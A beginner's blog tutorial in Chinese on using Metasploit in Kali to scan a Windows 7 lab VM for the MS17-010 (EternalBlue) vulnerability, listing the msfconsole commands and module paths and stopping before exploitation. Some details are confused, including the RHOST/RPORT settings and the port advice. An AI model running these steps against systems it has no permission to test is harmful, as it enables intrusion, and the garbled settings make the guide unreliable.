利用Kali Linux自带的MSF进行msf17-010漏洞模块(永恒之蓝漏洞)实现远程攻击

       在前面两期文章中,我们学习了如何使用MSF工具实现Windows远程控制icon-default.png?t=N7T8https://blog.csdn.net/2301_79704866/article/details/136142270?app_version=6.2.8&csdn_share_tail=%7B%22type%22%3A%22blog%22%2C%22rType%22%3A%22article%22%2C%22rId%22%3A%22136142270%22%2C%22source%22%3A%222301_79704866%22%7D&utm_source=app以及后期渗透icon-default.png?t=N7T8https://blog.csdn.net/2301_79704866/article/details/136177320?app_version=6.2.8&csdn_share_tail=%7B%22type%22%3A%22blog%22%2C%22rType%22%3A%22article%22%2C%22rId%22%3A%22136177320%22%2C%22source%22%3A%222301_79704866%22%7D&utm_source=app       这使许多同学认为MSF就只是一个后门生成器。其实不然,今天我们就来学习MSF的另一个功能——鼎鼎大名的永恒之蓝漏洞攻击。建议小白收藏。

       首先,准备好要用的工具。

1.Kali Linux2023.4版本虚拟机(攻击机)

2.Windows7虚拟机(靶机)

正式开始

1.以root形式打开Kali命令提示符

2.输入命令:

msfconsole

启动MSF程序。

3.众所周知,MSF的攻击模块高达近2000种,所以这里我们使用如下命令找到我们要用的永恒之蓝漏洞

search ms17_010

其中auxil iary/ scanner/ smb/ smb/ms17010为扫描模块,用于对目标是否存在永恒之蓝漏洞进行确认
exploit /wi ndows/ smb/ms17 010 eternalblue为攻击模块,用于对存在永恒之蓝漏洞的目标进行攻击

4.使用

use auxiliary/scanner/smb/smb_ms17_010

命令进行分析。

5.使用命令

show options

查看配置。这时候只用更改两个攻击配置。

分别为RHOSTSRPORT其中RHOST是靶机的IP地址,RPORT是要攻击的端口。如果不确定靶机开了哪些端口,可以在靶机上使用

netstat -an

命令查看开放端口。

6.接下来更改这两个配置。

set RHOST (目标IP地址)
set RPORT (目标主机的开放且未被占用的端口)

7.输入

run

运行。

8.一般来说会显示

说明完成了攻击但未建立攻击会话。

好啦,今天的教程就到这里啦。如果有同学想要知道如果攻击成功应该怎么做请在评论区评论“666”。如果点赞破10出教程。感谢在座各位大佬的支持!本人初中生纯Linux小白,还请大佬们指导(恳求

  • 57
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值